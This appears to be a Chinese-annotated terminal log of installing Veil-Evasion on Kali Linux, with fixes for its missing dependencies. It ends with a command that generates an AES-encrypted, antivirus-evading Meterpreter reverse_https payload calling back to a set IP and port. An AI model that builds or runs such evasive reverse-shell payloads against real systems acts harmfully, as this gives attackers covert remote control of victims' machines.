root@macbook:~# cd /usr/share/

root@macbook:/usr/share# git clone https://github.com/Veil-Framework/Veil-Evasion.git

正克隆到 'Veil-Evasion'...

remote: Counting objects: 2197, done.

remote: Compressing objects: 100% (8/8), done.

remote: Total 2197 (delta 1), reused 0 (delta 0), pack-reused 2189

Receiving objects: 100% (2197/2197), 33.84 MiB | 769 KiB/s, done.

Resolving deltas: 100% (1153/1153), done.

root@macbook:/usr/share# cd Veil-Evasion/

root@macbook:/usr/share#./setup/setup.py #运行后弹出如下对话框点OK

clip_image001

root@macbook:/usr/share/Veil-Evasion# ./Veil-Evasion.py

=========================================================================

Necessary install component missing

Re-running ./setup/setup.sh

=========================================================================

==========================================================================

Veil-Evasion Setup Script | [Updated]: 09.09.2014

==========================================================================

[Web]: https://www.veil-framework.com | [Twitter]: @VeilFramework

==========================================================================

[WARNING]: Setup No Longer Requires Constant Root Privileges.

Continuing Will Install Veil Only For The Root User.

Continue With Installation? (y/n): y

Kali linux detected...

[*] Capstone Already Installed... Skipping.

[*] Wine Python Already Installed... Skipping.

[*] Initializing Apt Package Installation

[*] Installing Microsoft Fonts

正在读取软件包列表... 完成

正在分析软件包的依赖关系树

正在读取状态信息... 完成

下列【新】软件包将被安装:

ttf-mscorefonts-installer

升级了 0 个软件包,新安装了 1 个软件包,要卸载 0 个软件包,有 324 个软件包未被升级。

需要下载 33.3 kB 的软件包。

解压缩后会消耗掉 127 kB 的额外空间。

【警告】:下列软件包不能通过验证!

ttf-mscorefonts-installer

E: 碰到了一些问题,您使用了 -y 选项,但是没有用 --force-yes

[*] Installing Apt Dependencies

正在读取软件包列表... 完成

正在分析软件包的依赖关系树

正在读取状态信息... 完成

python 已经是最新的版本了。

python-crypto 已经是最新的版本了。

python-crypto 被设置为手动安装。

ruby 已经是最新的版本了。

ruby 被设置为手动安装。

wine 已经是最新的版本了。

wine 被设置为手动安装。

将会安装下列额外的软件包:

binutils-mingw-w64-i686 binutils-mingw-w64-x86-64 cli-common g++-mingw-w64 g++-mingw-w64-i686

g++-mingw-w64-x86-64 gcc-mingw-w64 gcc-mingw-w64-base gcc-mingw-w64-i686 gcc-mingw-w64-x86-64

gfortran-mingw-w64 gfortran-mingw-w64-i686 gfortran-mingw-w64-x86-64 gnat-mingw-w64 gnat-mingw-w64-i686

gnat-mingw-w64-x86-64 libart2.0-cil libgconf2.0-cil libgdiplus libglade2.0-cil libglade2.0-cil-dev

libglib2.0-cil libglib2.0-cil-dev libgnome-vfs2.0-cil libgnome2.24-cil libgtk2.0-cil libgtk2.0-cil-dev

libmono-2.0-1 libmono-2.0-dev libmono-accessibility2.0-cil libmono-accessibility4.0-cil

libmono-addins-gui0.2-cil libmono-addins0.2-cil libmono-c5-1.1-cil libmono-cairo2.0-cil libmono-cairo4.0-cil

libmono-cecil-private-cil libmono-cil-dev libmono-codecontracts4.0-cil

libmono-compilerservices-symbolwriter4.0-cil libmono-corlib2.0-cil libmono-corlib4.0-cil

libmono-cscompmgd8.0-cil libmono-csharp4.0-cil libmono-custommarshalers4.0-cil libmono-data-tds2.0-cil

libmono-data-tds4.0-cil libmono-db2-1.0-cil libmono-debugger-soft2.0-cil libmono-debugger-soft4.0-cil

libmono-http4.0-cil libmono-i18n-cjk4.0-cil libmono-i18n-mideast4.0-cil libmono-i18n-other4.0-cil

libmono-i18n-rare4.0-cil libmono-i18n-west2.0-cil libmono-i18n-west4.0-cil libmono-i18n2.0-cil

libmono-i18n4.0-all libmono-i18n4.0-cil libmono-ldap2.0-cil libmono-ldap4.0-cil libmono-management2.0-cil

libmono-management4.0-cil libmono-messaging-rabbitmq2.0-cil libmono-messaging-rabbitmq4.0-cil

libmono-messaging2.0-cil libmono-messaging4.0-cil libmono-microsoft-build-engine4.0-cil

libmono-microsoft-build-framework4.0-cil libmono-microsoft-build-tasks-v4.0-4.0-cil

libmono-microsoft-build-utilities-v4.0-4.0-cil libmono-microsoft-build2.0-cil libmono-microsoft-csharp4.0-cil

libmono-microsoft-visualc10.0-cil libmono-microsoft-web-infrastructure1.0-cil libmono-microsoft8.0-cil

libmono-npgsql2.0-cil libmono-npgsql4.0-cil libmono-opensystem-c4.0-cil libmono-oracle2.0-cil

libmono-oracle4.0-cil libmono-peapi2.0-cil libmono-peapi4.0-cil libmono-posix2.0-cil libmono-posix4.0-cil

libmono-rabbitmq2.0-cil libmono-rabbitmq4.0-cil libmono-relaxng2.0-cil libmono-relaxng4.0-cil

libmono-security2.0-cil libmono-security4.0-cil libmono-sharpzip2.6-cil libmono-sharpzip2.84-cil

libmono-sharpzip4.84-cil libmono-simd2.0-cil libmono-simd4.0-cil libmono-sqlite2.0-cil libmono-sqlite4.0-cil

libmono-system-componentmodel-composition4.0-cil libmono-system-componentmodel-dataannotations4.0-cil

libmono-system-configuration-install4.0-cil libmono-system-configuration4.0-cil libmono-system-core4.0-cil

libmono-system-data-datasetextensions4.0-cil libmono-system-data-linq2.0-cil libmono-system-data-linq4.0-cil

libmono-system-data-services-client4.0-cil libmono-system-data-services4.0-cil libmono-system-data2.0-cil

libmono-system-data4.0-cil libmono-system-design4.0-cil libmono-system-drawing-design4.0-cil

libmono-system-drawing4.0-cil libmono-system-dynamic4.0-cil libmono-system-enterpriseservices4.0-cil

libmono-system-identitymodel-selectors4.0-cil libmono-system-identitymodel4.0-cil libmono-system-ldap2.0-cil

libmono-system-ldap4.0-cil libmono-system-management4.0-cil libmono-system-messaging2.0-cil

libmono-system-messaging4.0-cil libmono-system-net4.0-cil libmono-system-numerics4.0-cil

libmono-system-runtime-caching4.0-cil libmono-system-runtime-durableinstancing4.0-cil

libmono-system-runtime-serialization-formatters-soap4.0-cil libmono-system-runtime-serialization4.0-cil

libmono-system-runtime2.0-cil libmono-system-runtime4.0-cil libmono-system-security4.0-cil

libmono-system-servicemodel-discovery4.0-cil libmono-system-servicemodel-routing4.0-cil

libmono-system-servicemodel-web4.0-cil libmono-system-servicemodel4.0-cil libmono-system-serviceprocess4.0-cil

libmono-system-transactions4.0-cil libmono-system-web-abstractions4.0-cil

libmono-system-web-applicationservices4.0-cil libmono-system-web-dynamicdata4.0-cil

libmono-system-web-extensions-design4.0-cil libmono-system-web-extensions4.0-cil libmono-system-web-mvc1.0-cil

libmono-system-web-mvc2.0-cil libmono-system-web-routing4.0-cil libmono-system-web-services4.0-cil

libmono-system-web2.0-cil libmono-system-web4.0-cil libmono-system-windows-forms-datavisualization4.0-cil

libmono-system-windows-forms4.0-cil libmono-system-xaml4.0-cil libmono-system-xml-linq4.0-cil

libmono-system-xml4.0-cil libmono-system2.0-cil libmono-system4.0-cil libmono-tasklets2.0-cil

libmono-tasklets4.0-cil libmono-wcf3.0-cil libmono-web4.0-cil libmono-webbrowser2.0-cil

libmono-webbrowser4.0-cil libmono-webmatrix-data4.0-cil libmono-windowsbase3.0-cil libmono-windowsbase4.0-cil

libmono-winforms2.0-cil libmono2.0-cil libnunit-cil-dev libnunit2.6-cil libwebkit1.1-cil mingw-w64-i686-dev

mingw-w64-x86-64-dev mono-4.0-gac mono-csharp-shell mono-devel mono-dmcs mono-gac mono-runtime mono-xbuild

monodoc-base monodoc-manual python-setuptools

建议安装的软件包:

gcc-4.6-locales monodoc-gtk2.0-manual libgamin0 libnunit-doc monodoc-nunit-manual monodoc-webkit-manual

exuberant-ctags mono-vbnc mono-xsp mono-xsp4 monodevelop-database monodevelop-debugger-gdb monodevelop-nunit

monodevelop-versioncontrol monodoc-gtk-manual monodoc-gecko-manual

推荐安装的软件包:

libgluezilla python-dev-all

下列【新】软件包将被安装:

binutils-mingw-w64-i686 binutils-mingw-w64-x86-64 cli-common g++-mingw-w64 g++-mingw-w64-i686

g++-mingw-w64-x86-64 gcc-mingw-w64 gcc-mingw-w64-base gcc-mingw-w64-i686 gcc-mingw-w64-x86-64

gfortran-mingw-w64 gfortran-mingw-w64-i686 gfortran-mingw-w64-x86-64 gnat-mingw-w64 gnat-mingw-w64-i686

gnat-mingw-w64-x86-64 libart2.0-cil libgconf2.0-cil libgdiplus libglade2.0-cil libglade2.0-cil-dev

libglib2.0-cil libglib2.0-cil-dev libgnome-vfs2.0-cil libgnome2.24-cil libgtk2.0-cil libgtk2.0-cil-dev

libmono-2.0-1 libmono-2.0-dev libmono-accessibility2.0-cil libmono-accessibility4.0-cil

libmono-addins-gui0.2-cil libmono-addins0.2-cil libmono-c5-1.1-cil libmono-cairo2.0-cil libmono-cairo4.0-cil

libmono-cecil-private-cil libmono-cil-dev libmono-codecontracts4.0-cil

libmono-compilerservices-symbolwriter4.0-cil libmono-corlib2.0-cil libmono-corlib4.0-cil

libmono-cscompmgd8.0-cil libmono-csharp4.0-cil libmono-custommarshalers4.0-cil libmono-data-tds2.0-cil

libmono-data-tds4.0-cil libmono-db2-1.0-cil libmono-debugger-soft2.0-cil libmono-debugger-soft4.0-cil

libmono-http4.0-cil libmono-i18n-cjk4.0-cil libmono-i18n-mideast4.0-cil libmono-i18n-other4.0-cil

libmono-i18n-rare4.0-cil libmono-i18n-west2.0-cil libmono-i18n-west4.0-cil libmono-i18n2.0-cil

libmono-i18n4.0-all libmono-i18n4.0-cil libmono-ldap2.0-cil libmono-ldap4.0-cil libmono-management2.0-cil

libmono-management4.0-cil libmono-messaging-rabbitmq2.0-cil libmono-messaging-rabbitmq4.0-cil

libmono-messaging2.0-cil libmono-messaging4.0-cil libmono-microsoft-build-engine4.0-cil

libmono-microsoft-build-framework4.0-cil libmono-microsoft-build-tasks-v4.0-4.0-cil

libmono-microsoft-build-utilities-v4.0-4.0-cil libmono-microsoft-build2.0-cil libmono-microsoft-csharp4.0-cil

libmono-microsoft-visualc10.0-cil libmono-microsoft-web-infrastructure1.0-cil libmono-microsoft8.0-cil

libmono-npgsql2.0-cil libmono-npgsql4.0-cil libmono-opensystem-c4.0-cil libmono-oracle2.0-cil

libmono-oracle4.0-cil libmono-peapi2.0-cil libmono-peapi4.0-cil libmono-posix2.0-cil libmono-posix4.0-cil

libmono-rabbitmq2.0-cil libmono-rabbitmq4.0-cil libmono-relaxng2.0-cil libmono-relaxng4.0-cil

libmono-security2.0-cil libmono-security4.0-cil libmono-sharpzip2.6-cil libmono-sharpzip2.84-cil

libmono-sharpzip4.84-cil libmono-simd2.0-cil libmono-simd4.0-cil libmono-sqlite2.0-cil libmono-sqlite4.0-cil

libmono-system-componentmodel-composition4.0-cil libmono-system-componentmodel-dataannotations4.0-cil

libmono-system-configuration-install4.0-cil libmono-system-configuration4.0-cil libmono-system-core4.0-cil

libmono-system-data-datasetextensions4.0-cil libmono-system-data-linq2.0-cil libmono-system-data-linq4.0-cil

libmono-system-data-services-client4.0-cil libmono-system-data-services4.0-cil libmono-system-data2.0-cil

libmono-system-data4.0-cil libmono-system-design4.0-cil libmono-system-drawing-design4.0-cil

libmono-system-drawing4.0-cil libmono-system-dynamic4.0-cil libmono-system-enterpriseservices4.0-cil

libmono-system-identitymodel-selectors4.0-cil libmono-system-identitymodel4.0-cil libmono-system-ldap2.0-cil

libmono-system-ldap4.0-cil libmono-system-management4.0-cil libmono-system-messaging2.0-cil

libmono-system-messaging4.0-cil libmono-system-net4.0-cil libmono-system-numerics4.0-cil

libmono-system-runtime-caching4.0-cil libmono-system-runtime-durableinstancing4.0-cil

libmono-system-runtime-serialization-formatters-soap4.0-cil libmono-system-runtime-serialization4.0-cil

libmono-system-runtime2.0-cil libmono-system-runtime4.0-cil libmono-system-security4.0-cil

libmono-system-servicemodel-discovery4.0-cil libmono-system-servicemodel-routing4.0-cil

libmono-system-servicemodel-web4.0-cil libmono-system-servicemodel4.0-cil libmono-system-serviceprocess4.0-cil

libmono-system-transactions4.0-cil libmono-system-web-abstractions4.0-cil

libmono-system-web-applicationservices4.0-cil libmono-system-web-dynamicdata4.0-cil

libmono-system-web-extensions-design4.0-cil libmono-system-web-extensions4.0-cil libmono-system-web-mvc1.0-cil

libmono-system-web-mvc2.0-cil libmono-system-web-routing4.0-cil libmono-system-web-services4.0-cil

libmono-system-web2.0-cil libmono-system-web4.0-cil libmono-system-windows-forms-datavisualization4.0-cil

libmono-system-windows-forms4.0-cil libmono-system-xaml4.0-cil libmono-system-xml-linq4.0-cil

libmono-system-xml4.0-cil libmono-system2.0-cil libmono-system4.0-cil libmono-tasklets2.0-cil

libmono-tasklets4.0-cil libmono-wcf3.0-cil libmono-web4.0-cil libmono-webbrowser2.0-cil

libmono-webbrowser4.0-cil libmono-webmatrix-data4.0-cil libmono-windowsbase3.0-cil libmono-windowsbase4.0-cil

libmono-winforms2.0-cil libmono2.0-cil libnunit-cil-dev libnunit2.6-cil libwebkit1.1-cil mingw-w64

mingw-w64-i686-dev mingw-w64-x86-64-dev mono-4.0-gac mono-csharp-shell mono-devel mono-dmcs mono-gac mono-mcs

mono-runtime mono-xbuild monodevelop monodoc-base monodoc-browser monodoc-manual python-pefile python-pip

python-setuptools

下列软件包将被升级:

unzip

升级了 1 个软件包,新安装了 188 个软件包,要卸载 0 个软件包,有 323 个软件包未被升级。

需要下载 164 MB 的软件包。

解压缩后会消耗掉 583 MB 的额外空间。

【警告】:下列软件包不能通过验证!

cli-common libmono-system-xml4.0-cil libmono-system-security4.0-cil libmono-system-configuration4.0-cil

libmono-system4.0-cil libmono-security4.0-cil mono-4.0-gac mono-gac mono-runtime libmono-corlib4.0-cil

libglib2.0-cil libart2.0-cil libgconf2.0-cil libgdiplus libmono-cairo4.0-cil libmono-system-drawing4.0-cil

libgtk2.0-cil libglade2.0-cil libglib2.0-cil-dev libgtk2.0-cil-dev libglade2.0-cil-dev libgnome-vfs2.0-cil

libgnome2.24-cil libmono-2.0-1 libmono-2.0-dev libmono-corlib2.0-cil libmono-accessibility2.0-cil

libmono-accessibility4.0-cil libmono-sharpzip4.84-cil libmono-posix4.0-cil libmono-system-core4.0-cil

libmono-addins0.2-cil libmono-addins-gui0.2-cil libmono-c5-1.1-cil libmono-cairo2.0-cil libmono-posix2.0-cil

libmono-security2.0-cil libmono-system2.0-cil libmono-cecil-private-cil libmono-sharpzip2.84-cil

libmono-data-tds2.0-cil libmono-system-data2.0-cil libmono-sqlite2.0-cil libmono-messaging2.0-cil

libmono-system-messaging2.0-cil libmono-wcf3.0-cil libmono-system-data-linq2.0-cil libmono-system-web2.0-cil

libmono2.0-cil libmono-codecontracts4.0-cil libmono-compilerservices-symbolwriter4.0-cil

libmono-cscompmgd8.0-cil libmono-csharp4.0-cil libmono-custommarshalers4.0-cil libmono-data-tds4.0-cil

libmono-system-transactions4.0-cil libmono-system-enterpriseservices4.0-cil libmono-system-data4.0-cil

libmono-db2-1.0-cil libmono-debugger-soft2.0-cil libmono-debugger-soft4.0-cil libmono-sqlite4.0-cil

libmono-system-web-applicationservices4.0-cil libmono-system-web-services4.0-cil libmono-web4.0-cil

libmono-system-web4.0-cil libmono-http4.0-cil libmono-i18n-west2.0-cil libmono-i18n2.0-cil libmono-i18n4.0-cil

libmono-i18n-cjk4.0-cil libmono-i18n-mideast4.0-cil libmono-i18n-other4.0-cil libmono-i18n-rare4.0-cil

libmono-i18n-west4.0-cil libmono-i18n4.0-all libmono-ldap2.0-cil libmono-ldap4.0-cil libmono-management2.0-cil

libmono-management4.0-cil libmono-messaging4.0-cil libmono-rabbitmq2.0-cil libmono-messaging-rabbitmq2.0-cil

libmono-rabbitmq4.0-cil libmono-messaging-rabbitmq4.0-cil libmono-microsoft8.0-cil

libmono-microsoft-build2.0-cil libmono-microsoft-build-framework4.0-cil

libmono-microsoft-build-utilities-v4.0-4.0-cil libmono-microsoft-build-engine4.0-cil

libmono-microsoft-build-tasks-v4.0-4.0-cil libmono-microsoft-csharp4.0-cil libmono-microsoft-visualc10.0-cil

libmono-microsoft-web-infrastructure1.0-cil libmono-npgsql2.0-cil libmono-npgsql4.0-cil

libmono-opensystem-c4.0-cil libmono-oracle2.0-cil libmono-oracle4.0-cil libmono-peapi2.0-cil

libmono-peapi4.0-cil libmono-relaxng2.0-cil libmono-relaxng4.0-cil libmono-sharpzip2.6-cil libmono-simd2.0-cil

libmono-simd4.0-cil libmono-system-componentmodel-composition4.0-cil

libmono-system-componentmodel-dataannotations4.0-cil libmono-system-configuration-install4.0-cil

libmono-system-data-datasetextensions4.0-cil libmono-system-runtime-serialization4.0-cil

libmono-system-data-linq4.0-cil libmono-system-identitymodel4.0-cil

libmono-system-identitymodel-selectors4.0-cil libmono-webbrowser4.0-cil libmono-system-windows-forms4.0-cil

libmono-system-messaging4.0-cil libmono-system-servicemodel4.0-cil libmono-system-web-extensions4.0-cil

libmono-system-servicemodel-web4.0-cil libmono-system-data-services4.0-cil libmono-system-xml-linq4.0-cil

libmono-system-data-services-client4.0-cil libmono-system-drawing-design4.0-cil libmono-system-design4.0-cil

libmono-system-dynamic4.0-cil libmono-system-ldap2.0-cil libmono-system-ldap4.0-cil

libmono-system-management4.0-cil libmono-system-net4.0-cil libmono-system-numerics4.0-cil

libmono-system-runtime2.0-cil libmono-system-runtime-serialization-formatters-soap4.0-cil

libmono-system-runtime4.0-cil libmono-system-runtime-caching4.0-cil

libmono-system-runtime-durableinstancing4.0-cil libmono-system-servicemodel-discovery4.0-cil

libmono-system-servicemodel-routing4.0-cil libmono-system-serviceprocess4.0-cil

libmono-system-web-abstractions4.0-cil libmono-system-web-dynamicdata4.0-cil

libmono-system-web-extensions-design4.0-cil libmono-system-web-mvc1.0-cil libmono-system-web-mvc2.0-cil

libmono-system-web-routing4.0-cil libmono-system-windows-forms-datavisualization4.0-cil

libmono-system-xaml4.0-cil libmono-tasklets2.0-cil libmono-tasklets4.0-cil libmono-webbrowser2.0-cil

libmono-webmatrix-data4.0-cil libmono-windowsbase3.0-cil libmono-windowsbase4.0-cil libmono-winforms2.0-cil

libnunit2.6-cil libnunit-cil-dev libmono-cil-dev libwebkit1.1-cil mono-csharp-shell mono-dmcs mono-xbuild

mono-devel mono-mcs monodoc-base monodoc-browser monodoc-manual monodevelop python-setuptools python-pip unzip

binutils-mingw-w64-i686 binutils-mingw-w64-x86-64 mingw-w64-i686-dev gcc-mingw-w64-base gcc-mingw-w64-i686

g++-mingw-w64-i686 mingw-w64-x86-64-dev gcc-mingw-w64-x86-64 g++-mingw-w64-x86-64 g++-mingw-w64 gcc-mingw-w64

gfortran-mingw-w64-i686 gfortran-mingw-w64-x86-64 gfortran-mingw-w64 gnat-mingw-w64-i686 gnat-mingw-w64-x86-64

gnat-mingw-w64 mingw-w64 python-pefile

E: 碰到了一些问题,您使用了 -y 选项,但是没有用 --force-yes

[*] Wine Ruby Already Installed... Skipping.

[*] Updating Veil-Framework Configuration

Veil-Framework configuration:

[*] OPERATING_SYSTEM = Kali

[*] TERMINAL_CLEAR = clear

[*] TEMP_DIR = /tmp/

[*] MSFVENOM_OPTIONS =

[*] METASPLOIT_PATH = /usr/share/metasploit-framework/

[*] PYINSTALLER_PATH = /opt/pyinstaller-2.0/

[*] VEIL_EVASION_PATH = /usr/share/Veil-Evasion/

[*] PAYLOAD_SOURCE_PATH = /usr/share/veil-output/source/

[*] PAYLOAD_COMPILED_PATH = /usr/share/veil-output/compiled/

[*] GENERATE_HANDLER_SCRIPT = True

[*] HANDLER_PATH = /usr/share/veil-output/handlers/

[*] HASH_LIST = /usr/share/veil-output/hashes.txt

[*] VEIL_CATAPULT_PATH = /usr/share/Veil-Catapult/

[*] CATAPULT_RESOURCE_PATH = /usr/share/veil-output/catapult/

Configuration File Written To '/etc/veil/settings.py'

[*] Ensuring this account owns veil output directory...

[!] Error importing pip

[!] Please run 'pip install symmetricjsonrpc' manually

root@macbook:/usr/share/Veil-Evasion# pip install symmetricjsonrpc

bash: pip: 未找到命令

此处报错解决如下(参考http://stackoverflow.com/questions/28050223/kali-linux-debian-cant-install-pip-py)

root@macbook:/usr/share/Veil-Evasion# wget https://bootstrap.pypa.io/get-pip.py

--2015-03-05 16:40:55-- https://bootstrap.pypa.io/get-pip.py

正在解析主机 bootstrap.pypa.io (bootstrap.pypa.io)... 103.245.222.175

正在连接 bootstrap.pypa.io (bootstrap.pypa.io)|103.245.222.175|:443... 已连接。

已发出 HTTP 请求,正在等待回应... 200 OK

长度:1608741 (1.5M) [text/x-python]

正在保存至: “get-pip.py”

100%[========================================================================>] 1,608,741 317K/s 用时 6.4s

2015-03-05 16:41:05 (247 KB/s) - 已保存 “get-pip.py” [1608741/1608741])

root@macbook:/usr/share/Veil-Evasion# python get-pip.py

Collecting pip

Downloading pip-6.0.8-py2.py3-none-any.whl (1.3MB)

100% |################################| 1.3MB 307kB/s

Collecting setuptools

Downloading setuptools-12.4-py2.py3-none-any.whl (501kB)

100% |################################| 503kB 853kB/s

Installing collected packages: setuptools, pip

Successfully installed pip-6.0.8 setuptools-12.4

root@macbook:/usr/share/Veil-Evasion# pip install symmetricjsonrpc

Collecting symmetricjsonrpc

Downloading symmetricjsonrpc-0.1.0.tar.gz

Installing collected packages: symmetricjsonrpc

Running setup.py install for symmetricjsonrpc

Successfully installed symmetricjsonrpc-0.1.0

root@macbook:/usr/share/Veil-Evasion# ./Veil-Evasion.py

=========================================================================

Veil-Evasion | [Version]: 2.17.0

=========================================================================

[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

=========================================================================

Traceback (most recent call last):

File "./Veil-Evasion.py", line 283, in <module>

controller = controller.Controller(oneRun=False)

File "/usr/share/Veil-Evasion/modules/common/controller.py", line 129, in __init__

self.LoadPayloads()

File "/usr/share/Veil-Evasion/modules/common/controller.py", line 141, in LoadPayloads

d = dict( (path[path.find("payloads")+9:-3], imp.load_source( "/".join(path.split("/")[3:])[:-3],path ) ) for path in glob.glob(join(settings.VEIL_EVASION_PATH+"/modules/payloads/" + "*/" * x,'[!_]*.py')) )

File "/usr/share/Veil-Evasion/modules/common/controller.py", line 141, in <genexpr>

d = dict( (path[path.find("payloads")+9:-3], imp.load_source( "/".join(path.split("/")[3:])[:-3],path ) ) for path in glob.glob(join(settings.VEIL_EVASION_PATH+"/modules/payloads/" + "*/" * x,'[!_]*.py')) )

File "/usr/share/Veil-Evasion//modules/payloads/native/backdoor_factory.py", line 14, in <module>

from tools.backdoor import pebin

File "/usr/share/Veil-Evasion/tools/backdoor/pebin.py", line 42, in <module>

import pefile

ImportError: No module named pefile

此处报错解决如下(参考https://github.com/Veil-Framework/Veil-Evasion/issues/66)

root@macbook:/usr/share/Veil-Evasion# wget http://ftp.acc.umu.se/mirror/ubuntu/ubuntu/pool/universe/p/python-pefile/python-pefile_1.2.9.1-1_all.deb

--2015-03-05 16:42:50-- http://ftp.acc.umu.se/mirror/ubuntu/ubuntu/pool/universe/p/python-pefile/python-pefile_1.2.9.1-1_all.deb

正在解析主机 ftp.acc.umu.se (ftp.acc.umu.se)... 130.239.18.163, 130.239.18.173, 130.239.18.165, ...

正在连接 ftp.acc.umu.se (ftp.acc.umu.se)|130.239.18.163|:80... 已连接。

已发出 HTTP 请求,正在等待回应... 200 OK

长度:41170 (40K) [application/x-debian-package]

正在保存至: “python-pefile_1.2.9.1-1_all.deb”

100%[========================================================================>] 41,170 52.9K/s 用时 0.8s

2015-03-05 16:42:54 (52.9 KB/s) - 已保存 “python-pefile_1.2.9.1-1_all.deb” [41170/41170])

root@macbook:/usr/share/Veil-Evasion# dpkg -i python-pefile_1.2.9.1-1_all.deb

Selecting previously unselected package python-pefile.

(正在读取数据库 ... 系统当前共安装有 363146 个文件和目录。)

正在解压缩 python-pefile (从 python-pefile_1.2.9.1-1_all.deb) ...

正在设置 python-pefile (1.2.9.1-1) ...

正在处理用于 python-central 的触发器...

root@macbook:/usr/share/Veil-Evasion# ./Veil-Evasion.py

=========================================================================

Veil-Evasion | [Version]: 2.17.0

=========================================================================

[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

=========================================================================

Traceback (most recent call last):

File "./Veil-Evasion.py", line 283, in <module>

controller = controller.Controller(oneRun=False)

File "/usr/share/Veil-Evasion/modules/common/controller.py", line 129, in __init__

self.LoadPayloads()

File "/usr/share/Veil-Evasion/modules/common/controller.py", line 141, in LoadPayloads

d = dict( (path[path.find("payloads")+9:-3], imp.load_source( "/".join(path.split("/")[3:])[:-3],path ) ) for path in glob.glob(join(settings.VEIL_EVASION_PATH+"/modules/payloads/" + "*/" * x,'[!_]*.py')) )

File "/usr/share/Veil-Evasion/modules/common/controller.py", line 141, in <genexpr>

d = dict( (path[path.find("payloads")+9:-3], imp.load_source( "/".join(path.split("/")[3:])[:-3],path ) ) for path in glob.glob(join(settings.VEIL_EVASION_PATH+"/modules/payloads/" + "*/" * x,'[!_]*.py')) )

File "/usr/share/Veil-Evasion//modules/payloads/native/backdoor_factory.py", line 14, in <module>

from tools.backdoor import pebin

File "/usr/share/Veil-Evasion/tools/backdoor/pebin.py", line 44, in <module>

from intel.intelCore import intelCore

File "/usr/share/Veil-Evasion/tools/backdoor/intel/intelCore.py", line 38, in <module>

from capstone import *

ImportError: No module named capstone

一样pip安装

root@macbook:/usr/share/Veil-Evasion# pip install capstone

Collecting capstone

Downloading capstone-3.0.1.tar.gz (3.1MB)

100% |################################| 3.1MB 107kB/s

Installing collected packages: capstone

Running setup.py install for capstone

building 'capstone' library

rm -f ./cs.o ./utils.o ./SStream.o ./MCInstrDesc.o ./MCRegisterInfo.o ./arch/ARM/ARMDisassembler.o ./arch/ARM/ARMInstPrinter.o ./arch/ARM/ARMMapping.o ./arch/ARM/ARMModule.o ./arch/AArch64/AArch64BaseInfo.o ./arch/AArch64/AArch64Disassembler.o ./arch/AArch64/AArch64InstPrinter.o ./arch/AArch64/AArch64Mapping.o ./arch/AArch64/AArch64Module.o ./arch/Mips/MipsDisassembler.o ./arch/Mips/MipsInstPrinter.o ./arch/Mips/MipsMapping.o ./arch/Mips/MipsModule.o ./arch/PowerPC/PPCDisassembler.o ./arch/PowerPC/PPCInstPrinter.o ./arch/PowerPC/PPCMapping.o ./arch/PowerPC/PPCModule.o ./arch/Sparc/SparcDisassembler.o ./arch/Sparc/SparcInstPrinter.o ./arch/Sparc/SparcMapping.o ./arch/Sparc/SparcModule.o ./arch/SystemZ/SystemZDisassembler.o ./arch/SystemZ/SystemZInstPrinter.o ./arch/SystemZ/SystemZMapping.o ./arch/SystemZ/SystemZModule.o ./arch/SystemZ/SystemZMCTargetDesc.o ./arch/X86/X86DisassemblerDecoder.o ./arch/X86/X86Disassembler.o ./arch/X86/X86IntelInstPrinter.o ./arch/X86/X86ATTInstPrinter.o ./arch/X86/X86Mapping.o ./arch/X86/X86Module.o ./arch/XCore/XCoreDisassembler.o ./arch/XCore/XCoreInstPrinter.o ./arch/XCore/XCoreMapping.o ./arch/XCore/XCoreModule.o ./MCInst.o

rm -f ./libcapstone.* ./capstone.*

rm -f ./capstone.pc

CC cs.o

CC utils.o

CC SStream.o

CC MCInstrDesc.o

CC MCRegisterInfo.o

CC arch/ARM/ARMDisassembler.o

CC arch/ARM/ARMInstPrinter.o

CC arch/ARM/ARMMapping.o

CC arch/ARM/ARMModule.o

CC arch/AArch64/AArch64BaseInfo.o

CC arch/AArch64/AArch64Disassembler.o

CC arch/AArch64/AArch64InstPrinter.o

CC arch/AArch64/AArch64Mapping.o

CC arch/AArch64/AArch64Module.o

CC arch/Mips/MipsDisassembler.o

CC arch/Mips/MipsInstPrinter.o

CC arch/Mips/MipsMapping.o

CC arch/Mips/MipsModule.o

CC arch/PowerPC/PPCDisassembler.o

CC arch/PowerPC/PPCInstPrinter.o

CC arch/PowerPC/PPCMapping.o

CC arch/PowerPC/PPCModule.o

CC arch/Sparc/SparcDisassembler.o

CC arch/Sparc/SparcInstPrinter.o

CC arch/Sparc/SparcMapping.o

CC arch/Sparc/SparcModule.o

CC arch/SystemZ/SystemZDisassembler.o

CC arch/SystemZ/SystemZInstPrinter.o

CC arch/SystemZ/SystemZMapping.o

CC arch/SystemZ/SystemZModule.o

CC arch/SystemZ/SystemZMCTargetDesc.o

CC arch/X86/X86DisassemblerDecoder.o

CC arch/X86/X86Disassembler.o

CC arch/X86/X86IntelInstPrinter.o

CC arch/X86/X86ATTInstPrinter.o

CC arch/X86/X86Mapping.o

CC arch/X86/X86Module.o

CC arch/XCore/XCoreDisassembler.o

CC arch/XCore/XCoreInstPrinter.o

CC arch/XCore/XCoreMapping.o

CC arch/XCore/XCoreModule.o

CC MCInst.o

LINK libcapstone.so

AR libcapstone.a

ar: creating ./libcapstone.a

GEN capstone.pc

Successfully installed capstone-3.0.1

OK安装完成!

clip_image003

root@macbook:/usr/share/Veil-Evasion# ./Veil-Evasion.py -p python/shellcode_inject/aes_encrypt -o output1 --msfpayload windows/meterpreter/reverse_https --msfoptions LHOST=192.248.188.134 LPORT=8443

=========================================================================

Veil-Evasion | [Version]: 2.17.0

=========================================================================

[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

=========================================================================

[*] Generating shellcode...

No platform was selected, choosing Msf::Module::Platform::Windows from the payload

No Arch selected, selecting Arch: x86 from the payload

Found 1 compatible encoders

Attempting to encode payload with 1 iterations of x86/call4_dword_xor

x86/call4_dword_xor succeeded with size 380 (iteration=0)

err:winediag:SECUR32_initNTLMSP ntlm_auth was not found or is outdated. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution.

51 INFO: wrote Z:\usr\share\Veil-Evasion\output1.spec

71 INFO: Testing for ability to set icons, version resources...

75 INFO: ... resource update available

78 INFO: UPX is not available.

1016 INFO: checking Analysis

1016 INFO: building Analysis because out00-Analysis.toc non existent

1016 INFO: running Analysis out00-Analysis.toc

1017 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable

1019 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww ...

